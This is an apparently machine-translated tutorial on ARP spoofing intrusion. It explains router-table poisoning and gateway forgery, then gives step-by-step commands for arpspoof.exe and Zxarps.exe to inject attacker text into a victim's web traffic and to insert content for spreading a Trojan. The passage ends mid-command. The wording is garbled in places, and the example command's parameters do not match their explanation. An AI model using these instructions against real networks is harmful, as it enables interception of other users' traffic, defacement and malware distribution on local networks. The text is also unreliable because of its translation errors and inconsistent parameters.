The way and principle of influencing network patency-arp deception

From the impact of the smooth way of network connectivity, ARP spoofing can be divided into two types. One is the deception of the Router ARP table, this method can destroy the system's ARP cache table, thus composing the internal and external IP address confusion. The other is to the local area network computer Gateway deception, so that the intranet computer system data sent through a false gateway.

The first principle of ARP spoofing is to intercept gateway data. It informs the router a series of wrong intranet MAC address, and in accordance with the frequency of constant address replacement, so that the real address information can not be saved through the update in the router, the result of all the data router can only send to the wrong MAC address, resulting in computer access hackers carefully constructed network traps.

The second principle of ARP spoofing is to forge gateways. The idea is to set up a fake gateway so that the computer it cheats is sending data to a fake gateway, rather than using a normal router route to get online. In the user's point of view, is not on the net and the network dropped, which will give users the illusion of a system gateway error.

How to use "ARP spoofing" intrusion

The hacker needs only one prerequisite for ARP spoofing intrusion, that is, the computer on which the intrusion is made and the computer being attacked must be in a network segment of a local area network. Because ARP spoofing is spoofed through packets, a driver WinPcap is installed on the local computer before the operation (Figure 1).

Open the command prompt command for the system and switch to the directory where the tool is located, followed by the tools command: arpspoof.exe/n, and then a text file is generated. Now open this text file and then edit according to your own needs, such as "Hack by Cooldiyer" to "the system has been my successful invasion!" (Figure 2).

At the Command Prompt window, enter the command: Arpspoof 192.168.1.6 192.168.1.3 2 1/r Job.txt, where 192.168.1.6 represents the IP address of the intrusion computer, 192.168.1.3 represents the IP address of the hacked computer, and 80 represents the remote port for spoofing.

After the related parameter setting, the user should set the actual type of the network gateway (for example, some gateway address is 192.168.0.1 some are 192.168.110.1). When you enter the above command exactly, the program can perform an ARP spoofing attack (Figure 3). When another user accesses the 80 port on this server, the contents of our text file are seen from the browser.

Just use ARP cheat to do a website to attack just now, use another cheat tool to carry on the Trojan horse to spread. At the command prompt window, see how ARP Spoofing tool Zxarps.exe is used, and then type the command: Zxarps.exe-idx 0-ip 192.168.1.7-192.168.1.255-port 80-insert "